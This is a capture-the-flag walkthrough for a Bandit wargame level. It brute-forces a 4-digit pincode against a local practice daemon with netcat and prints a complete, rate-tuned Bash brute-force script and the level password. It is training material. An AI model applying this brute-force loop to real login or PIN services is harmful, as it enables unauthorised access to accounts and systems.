Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

Solution

Password: UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Alright. A daemon listening on port 30002. We need to give it the level 24 password and a secret 4 digit pincode.

Let’s just see what we’re dealing with.

Urgh. At least we know the format. But there are 10,000 potential pincodes, 0000 through 9999.

Brute-forcing sucks. It’s great when it works, but it just sucks. Let’s write a happy little Bash script to automate this.

Let’s make a happy little directory in /tmp.

Using vi, let’s create brute.sh.

Let’s run through it.

  1. Read bandit24's password and save it to a variable
  2. Loop between 1000 and 9999 and assign that value to i (note this skips 0000 to 0999, which are valid 4-digit pincodes; it happened to work here, but looping over 0000 to 9999 with zero-padding is the safe choice)
    1. Print out the password and the generated number
    2. Pass it to netcat via a pipe
    3. Append the output to a file
    4. Run the command in the background (so the next pincode is tried immediately)

Rather than set permissions, let’s run it directly…

Urgh. We’re brute-forcing too fast. While the daemon is busy or refusing connections, those attempts are simply lost, so we could blow straight past the correct pincode without ever seeing its reply. Let’s add a little delay between each attempt.
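Here is the whole thing as one script, written as an added example for this page rather than the brute.sh from the original post (whose contents are not reproduced here). It follows the steps above with the delay added, and also includes the final filtering step used below to pull the one unique line out of the output. Assumptions, labelled in the comments: the bandit24 password is read from /etc/bandit_pass/bandit24 (the usual Bandit location), the daemon is at localhost:30002, and every rejected attempt prints identical lines, so `sort | uniq -u` leaves only the reply for the correct pincode. Unlike the 1000 to 9999 loop described above, it covers 0000 through 9999.

```shell
#!/bin/bash
# Added example for brute-forcing the bandit24 -> bandit25 pincode.
# Not the original post's brute.sh. Assumptions: the level-24 password is
# in /etc/bandit_pass/bandit24, the daemon listens on localhost:30002, and
# each failed attempt produces the same rejection text.

HOST="${HOST:-localhost}"
PORT="${PORT:-30002}"
DELAY="${DELAY:-0.02}"            # seconds between attempts; tune as in the text
OUT="${OUT:-./output.txt}"        # where every daemon reply is appended

# Emit "password pin" for every pin 0000..9999 (10000 lines).
# Zero-padding matters: the pincode is 4 digits, so 0000-0999 are valid
# candidates and a loop over 1000-9999 silently misses 1000 of them.
gen_candidates() {
    password="$1"
    i=0
    while [ "$i" -le 9999 ]; do
        printf '%s %04d\n' "$password" "$i"
        i=$((i + 1))
    done
}

# One attempt per connection, each backgrounded so the next pin goes out
# immediately. The sleep keeps us under the daemon's connection limit so
# refused connections do not drop the correct pin on the floor.
brute_force() {
    password="$1"
    outfile="$2"
    gen_candidates "$password" | {
        while IFS= read -r line; do
            printf '%s\n' "$line" | nc "$HOST" "$PORT" >> "$outfile" &
            sleep "$DELAY"
        done
        wait    # inside the subshell, so it actually waits for the nc jobs
    }
}

# Every wrong attempt prints the same banner and rejection, so after
# sorting, the lines that appear exactly once are the correct-pin reply
# (which carries bandit25's password).
find_unique() {
    sort "$1" | uniq -u
}

# Only run the network part when explicitly asked, so the functions above
# can be sourced or tested without touching the daemon.
if [ "${BRUTE_RUN:-0}" = "1" ]; then
    PASSWORD=$(cat /etc/bandit_pass/bandit24)
    : > "$OUT"
    brute_force "$PASSWORD" "$OUT"
    find_unique "$OUT"
fi
```

Run it with `BRUTE_RUN=1 bash brute.sh` from a directory you own under /tmp. If the daemon keeps reading lines on a single open connection (worth confirming by hand before relying on it), you can avoid the per-connection rate problem entirely with `gen_candidates "$PASSWORD" | nc localhost 30002` and filter that output the same way.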

This takes a few minutes to run.

0.02 x 9000 = 180s

This is why brute-forcing sucks.

You can experiment with different sleep values to try and speed your script up. I found the lowest I could go was 0.012.

Once it’s done, let’s check our output.

Oh joy, a bunch of repeated lines. If only we could find the one unique line.

Oh wait, we can.

Ch’yeah.